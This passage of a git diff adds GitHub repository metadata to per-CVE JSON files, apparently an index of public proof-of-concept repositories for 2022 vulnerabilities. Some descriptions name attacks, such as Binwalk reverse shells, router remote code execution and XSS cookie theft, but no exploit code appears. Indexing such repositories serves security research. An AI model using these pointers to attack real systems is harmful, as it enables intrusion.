+ "id": 123830677,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123830677?v=4",
+ "html_url": "https:\/\/github.com\/dkstar11q"
+ },
+ "html_url": "https:\/\/github.com\/dkstar11q\/CVE-2022-44877",
+ "description": "Bash Script for Checking Command Injection Vulnerability on CentOS Web Panel [CWP] (CVE-2022-44877)",
+ "fork": false,
+ "created_at": "2023-03-27T17:27:19Z",
+ "updated_at": "2023-02-13T09:30:39Z",
+ "pushed_at": "2023-02-11T22:03:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
{
"id": 720567207,
"name": "CVE-2022-44877-RCE",
diff --git a/2022/CVE-2022-44900.json b/2022/CVE-2022-44900.json
new file mode 100644
index 0000000000..c65a5686df
--- /dev/null
+++ b/2022/CVE-2022-44900.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 591689085,
+ "name": "CVE-2022-44900-demo-lab",
+ "full_name": "0xless\/CVE-2022-44900-demo-lab",
+ "owner": {
+ "login": "0xless",
+ "id": 78535423,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78535423?v=4",
+ "html_url": "https:\/\/github.com\/0xless"
+ },
+ "html_url": "https:\/\/github.com\/0xless\/CVE-2022-44900-demo-lab",
+ "description": "Demo webapp vulnerable to CVE-2022-44900",
+ "fork": false,
+ "created_at": "2023-01-21T14:52:59Z",
+ "updated_at": "2023-01-29T19:40:29Z",
+ "pushed_at": "2023-06-21T07:02:31Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-45003.json b/2022/CVE-2022-45003.json
new file mode 100644
index 0000000000..45703cf017
--- /dev/null
+++ b/2022/CVE-2022-45003.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 620455544,
+ "name": "CVE-2022-45003",
+ "full_name": "mha98\/CVE-2022-45003",
+ "owner": {
+ "login": "mha98",
+ "id": 129213216,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129213216?v=4",
+ "html_url": "https:\/\/github.com\/mha98"
+ },
+ "html_url": "https:\/\/github.com\/mha98\/CVE-2022-45003",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-03-28T18:04:17Z",
+ "updated_at": "2023-03-28T18:04:17Z",
+ "pushed_at": "2023-03-28T18:05:03Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-45004.json b/2022/CVE-2022-45004.json
new file mode 100644
index 0000000000..02d3574772
--- /dev/null
+++ b/2022/CVE-2022-45004.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 620449786,
+ "name": "CVE-2022-45004",
+ "full_name": "mha98\/CVE-2022-45004",
+ "owner": {
+ "login": "mha98",
+ "id": 129213216,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129213216?v=4",
+ "html_url": "https:\/\/github.com\/mha98"
+ },
+ "html_url": "https:\/\/github.com\/mha98\/CVE-2022-45004",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-03-28T17:49:59Z",
+ "updated_at": "2023-03-28T17:49:59Z",
+ "pushed_at": "2023-03-28T18:03:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-45025.json b/2022/CVE-2022-45025.json
index 21f0c71ea1..bae21d69b5 100644
--- a/2022/CVE-2022-45025.json
+++ b/2022/CVE-2022-45025.json
@@ -34,5 +34,35 @@
"watchers": 89,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 652218279,
+ "name": "CVE-2022-45025",
+ "full_name": "andyhsu024\/CVE-2022-45025",
+ "owner": {
+ "login": "andyhsu024",
+ "id": 131547485,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131547485?v=4",
+ "html_url": "https:\/\/github.com\/andyhsu024"
+ },
+ "html_url": "https:\/\/github.com\/andyhsu024\/CVE-2022-45025",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-06-11T13:18:12Z",
+ "updated_at": "2023-06-11T13:18:12Z",
+ "pushed_at": "2023-06-11T13:18:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-45047.json b/2022/CVE-2022-45047.json
new file mode 100644
index 0000000000..cb5ca82683
--- /dev/null
+++ b/2022/CVE-2022-45047.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 624692526,
+ "name": "CVE-2022-45047",
+ "full_name": "hktalent\/CVE-2022-45047",
+ "owner": {
+ "login": "hktalent",
+ "id": 18223385,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18223385?v=4",
+ "html_url": "https:\/\/github.com\/hktalent"
+ },
+ "html_url": "https:\/\/github.com\/hktalent\/CVE-2022-45047",
+ "description": "POC,EXP,chatGPT for me",
+ "fork": false,
+ "created_at": "2023-04-07T03:16:47Z",
+ "updated_at": "2023-04-07T03:25:11Z",
+ "pushed_at": "2023-04-07T03:17:10Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-4510.json b/2022/CVE-2022-4510.json
index e144f5e82c..e2d86bf4ca 100644
--- a/2022/CVE-2022-4510.json
+++ b/2022/CVE-2022-4510.json
@@ -1,4 +1,64 @@
[
+ {
+ "id": 598309338,
+ "name": "CVE-2022-4510",
+ "full_name": "electr0sm0g\/CVE-2022-4510",
+ "owner": {
+ "login": "electr0sm0g",
+ "id": 8340491,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8340491?v=4",
+ "html_url": "https:\/\/github.com\/electr0sm0g"
+ },
+ "html_url": "https:\/\/github.com\/electr0sm0g\/CVE-2022-4510",
+ "description": "Binwalk Remote Command Execution",
+ "fork": false,
+ "created_at": "2023-02-06T20:53:49Z",
+ "updated_at": "2024-05-15T15:30:34Z",
+ "pushed_at": "2023-02-06T20:54:33Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 659028420,
+ "name": "CVE-2022-4510-WalkingPath",
+ "full_name": "adhikara13\/CVE-2022-4510-WalkingPath",
+ "owner": {
+ "login": "adhikara13",
+ "id": 44716348,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44716348?v=4",
+ "html_url": "https:\/\/github.com\/adhikara13"
+ },
+ "html_url": "https:\/\/github.com\/adhikara13\/CVE-2022-4510-WalkingPath",
+ "description": "A Python script for generating exploits targeting CVE-2022-4510 RCE Binwalk. It supports SSH, command execution, and reverse shell options. Exploits are saved in PNG format. Ideal for testing and demonstrations.",
+ "fork": false,
+ "created_at": "2023-06-27T02:20:13Z",
+ "updated_at": "2024-06-21T00:11:15Z",
+ "pushed_at": "2023-06-27T02:29:26Z",
+ "stargazers_count": 13,
+ "watchers_count": 13,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 13,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 665275498,
"name": "BadPfs-CVE-2022-4510",
diff --git a/2022/CVE-2022-45299.json b/2022/CVE-2022-45299.json
new file mode 100644
index 0000000000..a00fa403c0
--- /dev/null
+++ b/2022/CVE-2022-45299.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 588548677,
+ "name": "CVE-2022-45299",
+ "full_name": "offalltn\/CVE-2022-45299",
+ "owner": {
+ "login": "offalltn",
+ "id": 110370549,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110370549?v=4",
+ "html_url": "https:\/\/github.com\/offalltn"
+ },
+ "html_url": "https:\/\/github.com\/offalltn\/CVE-2022-45299",
+ "description": "CVE 2022-45299",
+ "fork": false,
+ "created_at": "2023-01-13T11:47:02Z",
+ "updated_at": "2023-05-24T12:30:02Z",
+ "pushed_at": "2023-01-13T12:01:29Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-45436.json b/2022/CVE-2022-45436.json
new file mode 100644
index 0000000000..8d64e5cfe1
--- /dev/null
+++ b/2022/CVE-2022-45436.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 602654488,
+ "name": "CVE-2022-45436",
+ "full_name": "damodarnaik\/CVE-2022-45436",
+ "owner": {
+ "login": "damodarnaik",
+ "id": 48156631,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48156631?v=4",
+ "html_url": "https:\/\/github.com\/damodarnaik"
+ },
+ "html_url": "https:\/\/github.com\/damodarnaik\/CVE-2022-45436",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-02-16T17:03:30Z",
+ "updated_at": "2023-02-16T17:03:30Z",
+ "pushed_at": "2023-02-16T17:26:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-45544.json b/2022/CVE-2022-45544.json
new file mode 100644
index 0000000000..ebfd48a966
--- /dev/null
+++ b/2022/CVE-2022-45544.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 597871098,
+ "name": "CVE-2022-45544",
+ "full_name": "tristao-marinho\/CVE-2022-45544",
+ "owner": {
+ "login": "tristao-marinho",
+ "id": 101610912,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101610912?v=4",
+ "html_url": "https:\/\/github.com\/tristao-marinho"
+ },
+ "html_url": "https:\/\/github.com\/tristao-marinho\/CVE-2022-45544",
+ "description": "SCHLIX CMS 2.2.7-2 arbitrary File Upload",
+ "fork": false,
+ "created_at": "2023-02-05T21:45:37Z",
+ "updated_at": "2023-02-05T21:45:37Z",
+ "pushed_at": "2023-02-05T23:45:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-45599.json b/2022/CVE-2022-45599.json
new file mode 100644
index 0000000000..e1be01b808
--- /dev/null
+++ b/2022/CVE-2022-45599.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 604672421,
+ "name": "CVE-2022-45599",
+ "full_name": "ethancunt\/CVE-2022-45599",
+ "owner": {
+ "login": "ethancunt",
+ "id": 25339018,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25339018?v=4",
+ "html_url": "https:\/\/github.com\/ethancunt"
+ },
+ "html_url": "https:\/\/github.com\/ethancunt\/CVE-2022-45599",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-02-21T14:55:21Z",
+ "updated_at": "2023-02-21T14:58:57Z",
+ "pushed_at": "2023-02-21T15:05:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-45600.json b/2022/CVE-2022-45600.json
new file mode 100644
index 0000000000..d15a1fc8e3
--- /dev/null
+++ b/2022/CVE-2022-45600.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 604671777,
+ "name": "CVE-2022-45600",
+ "full_name": "ethancunt\/CVE-2022-45600",
+ "owner": {
+ "login": "ethancunt",
+ "id": 25339018,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25339018?v=4",
+ "html_url": "https:\/\/github.com\/ethancunt"
+ },
+ "html_url": "https:\/\/github.com\/ethancunt\/CVE-2022-45600",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-02-21T14:53:54Z",
+ "updated_at": "2023-02-21T14:58:54Z",
+ "pushed_at": "2023-02-21T14:54:43Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-45701.json b/2022/CVE-2022-45701.json
new file mode 100644
index 0000000000..8d77b1cecd
--- /dev/null
+++ b/2022/CVE-2022-45701.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 602214790,
+ "name": "CVE-2022-45701",
+ "full_name": "yerodin\/CVE-2022-45701",
+ "owner": {
+ "login": "yerodin",
+ "id": 9205071,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9205071?v=4",
+ "html_url": "https:\/\/github.com\/yerodin"
+ },
+ "html_url": "https:\/\/github.com\/yerodin\/CVE-2022-45701",
+ "description": "Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated) POC Exploit (CVE-2022-45701)",
+ "fork": false,
+ "created_at": "2023-02-15T18:31:32Z",
+ "updated_at": "2023-02-21T07:33:33Z",
+ "pushed_at": "2023-02-16T18:15:55Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-45728.json b/2022/CVE-2022-45728.json
new file mode 100644
index 0000000000..ad895f0cff
--- /dev/null
+++ b/2022/CVE-2022-45728.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 585251034,
+ "name": "CVE-2022-45728",
+ "full_name": "sudoninja-noob\/CVE-2022-45728",
+ "owner": {
+ "login": "sudoninja-noob",
+ "id": 18701598,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18701598?v=4",
+ "html_url": "https:\/\/github.com\/sudoninja-noob"
+ },
+ "html_url": "https:\/\/github.com\/sudoninja-noob\/CVE-2022-45728",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-01-04T17:41:57Z",
+ "updated_at": "2023-01-04T17:41:57Z",
+ "pushed_at": "2023-01-04T17:43:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-45729.json b/2022/CVE-2022-45729.json
new file mode 100644
index 0000000000..86e659364f
--- /dev/null
+++ b/2022/CVE-2022-45729.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 585253557,
+ "name": "CVE-2022-45729",
+ "full_name": "sudoninja-noob\/CVE-2022-45729",
+ "owner": {
+ "login": "sudoninja-noob",
+ "id": 18701598,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18701598?v=4",
+ "html_url": "https:\/\/github.com\/sudoninja-noob"
+ },
+ "html_url": "https:\/\/github.com\/sudoninja-noob\/CVE-2022-45729",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-01-04T17:50:00Z",
+ "updated_at": "2023-01-04T17:50:00Z",
+ "pushed_at": "2023-01-04T17:50:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-45770.json b/2022/CVE-2022-45770.json
new file mode 100644
index 0000000000..9583effc84
--- /dev/null
+++ b/2022/CVE-2022-45770.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 591626374,
+ "name": "CVE-2022-45770",
+ "full_name": "Marsel-marsel\/CVE-2022-45770",
+ "owner": {
+ "login": "Marsel-marsel",
+ "id": 19998507,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19998507?v=4",
+ "html_url": "https:\/\/github.com\/Marsel-marsel"
+ },
+ "html_url": "https:\/\/github.com\/Marsel-marsel\/CVE-2022-45770",
+ "description": "LPE exploit via windows driver",
+ "fork": false,
+ "created_at": "2023-01-21T10:32:02Z",
+ "updated_at": "2023-09-02T18:57:44Z",
+ "pushed_at": "2023-04-25T07:54:36Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-45771.json b/2022/CVE-2022-45771.json
index b415e8993a..3eb1cc8ee0 100644
--- a/2022/CVE-2022-45771.json
+++ b/2022/CVE-2022-45771.json
@@ -33,5 +33,41 @@
"watchers": 44,
"score": 0,
"subscribers_count": 2
+ },
+ {
+ "id": 600465186,
+ "name": "CVE-2022-45771",
+ "full_name": "yuriisanin\/CVE-2022-45771",
+ "owner": {
+ "login": "yuriisanin",
+ "id": 11749007,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11749007?v=4",
+ "html_url": "https:\/\/github.com\/yuriisanin"
+ },
+ "html_url": "https:\/\/github.com\/yuriisanin\/CVE-2022-45771",
+ "description": "[PoC] Privilege escalation & code execution via LFI in PwnDoC ",
+ "fork": false,
+ "created_at": "2023-02-11T15:26:14Z",
+ "updated_at": "2024-04-16T17:40:38Z",
+ "pushed_at": "2023-02-11T15:30:56Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "exploit",
+ "privesc",
+ "privilege-escalation",
+ "pwndoc",
+ "rce"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-45934.json b/2022/CVE-2022-45934.json
new file mode 100644
index 0000000000..9439fcda49
--- /dev/null
+++ b/2022/CVE-2022-45934.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 591176120,
+ "name": "linux-4.19.72_CVE-2022-45934",
+ "full_name": "Trinadh465\/linux-4.19.72_CVE-2022-45934",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/linux-4.19.72_CVE-2022-45934",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-01-20T05:00:05Z",
+ "updated_at": "2023-03-10T01:13:39Z",
+ "pushed_at": "2023-01-20T05:09:28Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 591256259,
+ "name": "linux-4.1.15_CVE-2022-45934",
+ "full_name": "Trinadh465\/linux-4.1.15_CVE-2022-45934",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/linux-4.1.15_CVE-2022-45934",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-01-20T10:03:07Z",
+ "updated_at": "2023-03-10T01:20:04Z",
+ "pushed_at": "2023-01-20T10:08:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 618323077,
+ "name": "linux-4.1.15_CVE-2022-45934",
+ "full_name": "Satheesh575555\/linux-4.1.15_CVE-2022-45934",
+ "owner": {
+ "login": "Satheesh575555",
+ "id": 102573923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4",
+ "html_url": "https:\/\/github.com\/Satheesh575555"
+ },
+ "html_url": "https:\/\/github.com\/Satheesh575555\/linux-4.1.15_CVE-2022-45934",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-03-24T08:16:44Z",
+ "updated_at": "2023-03-24T08:21:50Z",
+ "pushed_at": "2023-03-24T08:19:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-46080.json b/2022/CVE-2022-46080.json
new file mode 100644
index 0000000000..5b4c5013c3
--- /dev/null
+++ b/2022/CVE-2022-46080.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 662043677,
+ "name": "CVE-2022-46080",
+ "full_name": "yerodin\/CVE-2022-46080",
+ "owner": {
+ "login": "yerodin",
+ "id": 9205071,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9205071?v=4",
+ "html_url": "https:\/\/github.com\/yerodin"
+ },
+ "html_url": "https:\/\/github.com\/yerodin\/CVE-2022-46080",
+ "description": "Nexxt Router 15.03.06.60 Authentication Bypass and Remote Command Execution",
+ "fork": false,
+ "created_at": "2023-07-04T08:31:04Z",
+ "updated_at": "2023-11-08T19:15:20Z",
+ "pushed_at": "2023-07-04T08:31:37Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-46087.json b/2022/CVE-2022-46087.json
new file mode 100644
index 0000000000..f646dedcdb
--- /dev/null
+++ b/2022/CVE-2022-46087.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 616850712,
+ "name": "CVE-2022-46087",
+ "full_name": "G37SYS73M\/CVE-2022-46087",
+ "owner": {
+ "login": "G37SYS73M",
+ "id": 77768845,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77768845?v=4",
+ "html_url": "https:\/\/github.com\/G37SYS73M"
+ },
+ "html_url": "https:\/\/github.com\/G37SYS73M\/CVE-2022-46087",
+ "description": "CloudSchool v3.0.1 is vulnerable to Cross Site Scripting (XSS). A normal user can steal session cookies of the admin users through notification received by the admin user.",
+ "fork": false,
+ "created_at": "2023-03-21T08:02:48Z",
+ "updated_at": "2023-03-21T08:02:48Z",
+ "pushed_at": "2023-03-21T08:03:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-46104.json b/2022/CVE-2022-46104.json
new file mode 100644
index 0000000000..4e00daec35
--- /dev/null
+++ b/2022/CVE-2022-46104.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 590562074,
+ "name": "CVE-2022-46104---POC",
+ "full_name": "NurSec747\/CVE-2022-46104---POC",
+ "owner": {
+ "login": "NurSec747",
+ "id": 123009127,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123009127?v=4",
+ "html_url": "https:\/\/github.com\/NurSec747"
+ },
+ "html_url": "https:\/\/github.com\/NurSec747\/CVE-2022-46104---POC",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-01-18T17:41:06Z",
+ "updated_at": "2023-01-18T17:41:06Z",
+ "pushed_at": "2023-01-18T17:51:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-4616.json b/2022/CVE-2022-4616.json
new file mode 100644
index 0000000000..dcdcb34c46
--- /dev/null
+++ b/2022/CVE-2022-4616.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 639674200,
+ "name": "CVE-2022-4616-POC",
+ "full_name": "ahanel13\/CVE-2022-4616-POC",
+ "owner": {
+ "login": "ahanel13",
+ "id": 47185077,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47185077?v=4",
+ "html_url": "https:\/\/github.com\/ahanel13"
+ },
+ "html_url": "https:\/\/github.com\/ahanel13\/CVE-2022-4616-POC",
+ "description": "This Python script aids in exploiting CVE-2022-46169 by automating payload delivery and response handling. It starts an HTTP server, listens for requests, and enables command input for real-time interaction with a vulnerable target.",
+ "fork": false,
+ "created_at": "2023-05-12T01:20:15Z",
+ "updated_at": "2023-05-24T22:36:05Z",
+ "pushed_at": "2023-05-24T22:36:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-46164.json b/2022/CVE-2022-46164.json
new file mode 100644
index 0000000000..7d6c24d241
--- /dev/null
+++ b/2022/CVE-2022-46164.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 585004232,
+ "name": "CVE-2022-46164-poc",
+ "full_name": "stephenbradshaw\/CVE-2022-46164-poc",
+ "owner": {
+ "login": "stephenbradshaw",
+ "id": 7692557,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7692557?v=4",
+ "html_url": "https:\/\/github.com\/stephenbradshaw"
+ },
+ "html_url": "https:\/\/github.com\/stephenbradshaw\/CVE-2022-46164-poc",
+ "description": "Basic POC exploit for CVE-2022-46164",
+ "fork": false,
+ "created_at": "2023-01-04T04:17:30Z",
+ "updated_at": "2023-09-08T08:19:32Z",
+ "pushed_at": "2023-01-11T07:16:34Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
